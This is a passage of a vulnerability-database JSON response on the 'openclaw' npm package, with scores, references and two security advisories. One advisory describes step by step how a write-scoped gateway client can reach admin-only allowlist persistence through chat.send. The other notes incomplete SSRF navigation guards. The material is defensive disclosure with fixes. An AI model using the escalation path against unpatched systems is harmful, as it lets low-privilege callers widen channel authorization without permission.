nup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-f8r2-vg7x-gh8m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p984-bgmq-zqc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91065?format=json","vulnerability_id":"VCID-pa1f-qzsh-efa9","summary":"OpenClaw: Gateway operator.write Can Reach Admin-Class Channel Allowlist Persistence via chat.send\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe shared `/allowlist` command persists channel authorization config through `writeConfigFile(...)` but does not re-validate gateway client scopes for internal gateway callers. Because `chat.send` is intentionally reachable to `operator.write` callers and still creates a generic command-authorized internal context, an authenticated write-scoped gateway client can indirectly mutate channel `allowFrom` and `groupAllowFrom` policy that direct `config.patch` correctly reserves to `operator.admin`.\n\nThis is not just a generic code smell. The current code already shows the intended boundary by adding sink-side internal admin checks to shared `/config` and `/plugins` writes, but `/allowlist` was left behind.\n\n## Details\n\nThe gateway's documented scope split is clear:\n\n- `chat.send` is a write-scoped action.\n- direct config mutation is an admin-scoped action.\n\nThe vulnerable path is:\n\n1. A gateway client authenticates with `operator.write`.\n2. The client calls `chat.send`, which is intentionally allowed for that scope.\n3. `chat.send` builds an internal message context with `CommandAuthorized: true` and carries `GatewayClientScopes` into the reply pipeline.\n4. `resolveCommandAuthorization(...)` converts that internal message into `isAuthorizedSender=true` in the common case where no stricter `commands.allowFrom` override is configured.\n5. `/allowlist add|remove` accepts that generic command authorization and proceeds into its config-backed edit path.\n6. The handler clones the parsed config, calls `plugin.allowlist.applyConfigEdit(...)`, validates the result, and persists it with `writeConfigFile(validated.config)`.\n7. No sink-side check requires `operator.admin` before the persistent write occurs.\n\nThat creates a direct control-plane mismatch:\n\n- `config.patch` rejects the same caller with `missing scope: operator.admin`.\n- `/allowlist add dm ...` or `/allowlist add group ...` reached through `chat.send` can still rewrite channel authorization state.\n\n## Impact\n\n- A gateway client intentionally limited to `operator.write` can persist first-party channel authorization policy.\n- The caller can widen DM or group allowlists for channels using the shared `/allowlist` plumbing.\n- This weakens the repo's documented control-plane privilege split between ordinary write actions and admin-only persistent authorization mutation.\n\n## Remediation\n\n### 1) Add the Missing Sink-Side Internal Admin Check to `/allowlist`\n\nMirror the existing hardened pattern from `/config` and `/plugins`.\n\nBefore any config-backed `/allowlist add|remove` write, require:\n\n- `operator.admin` for internal gateway channels\n\nThis should happen before `plugin.allowlist.applyConfigEdit(...)` and before `writeConfigFile(...)`.\n\n### 2) Keep Pairing-Store and Config-Write Policy Checks, but Do Not Treat Them as Scope Enforcement\n\n`configWrites` policy and pairing-store behavior are useful secondary controls, but they do not replace the missing privilege check between `operator.write` and `operator.admin`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35621","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1167","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11631","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11665","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35621"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-94pw-c6m8-p9p9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35621","reference_id":"CVE-2026-35621","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35621"},{"reference_url":"https://github.com/advisories/GHSA-94pw-c6m8-p9p9","reference_id":"GHSA-94pw-c6m8-p9p9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-94pw-c6m8-p9p9"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence","reference_id":"openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:21:07Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-to-allowlist-persistence"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35621","GHSA-94pw-c6m8-p9p9"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pa1f-qzsh-efa9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89001?format=json","vulnerability_id":"VCID-pae5-uyu7-k3c1","summary":"OpenClaw: Browser press/type interaction routes missed complete navigation guard coverage\n## Summary\n\nBrowser press/type interaction routes missed complete navigation guard coverage.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nSome browser press/type style interactions could trigger navigation without complete post-action SSRF policy enforcement.\n\n## Technical Details\n\nThe fix applies a three-phase interaction navigation guard to navigation-capable interactions, including pressKey and type submit flows.\n\n## Fix\n\nThe issue was fixed in #62023 and #63226 and #63889. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe`\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- `e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894`\n- PR: #62023, #63226, #63889\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43580","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10026","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.1001","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1159","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43580"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/049acf23cb03e1b92f5c71cd99c6ec5f35cc56fe"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e0b8ddc1a55185aff1cf9e0e095014d2e4f1d894"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62023","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62023"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63226","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63226"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63889","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63889"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-536q-mj95-h29h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43580","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43580"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-navigation-guard-coverage-in-browser-interactions"},{"reference_url":"https://github.com/advisories/GHSA-536q-mj95-h29h","reference_id":"GHSA-536q-mj95-h29h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-536q-mj95-h29h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"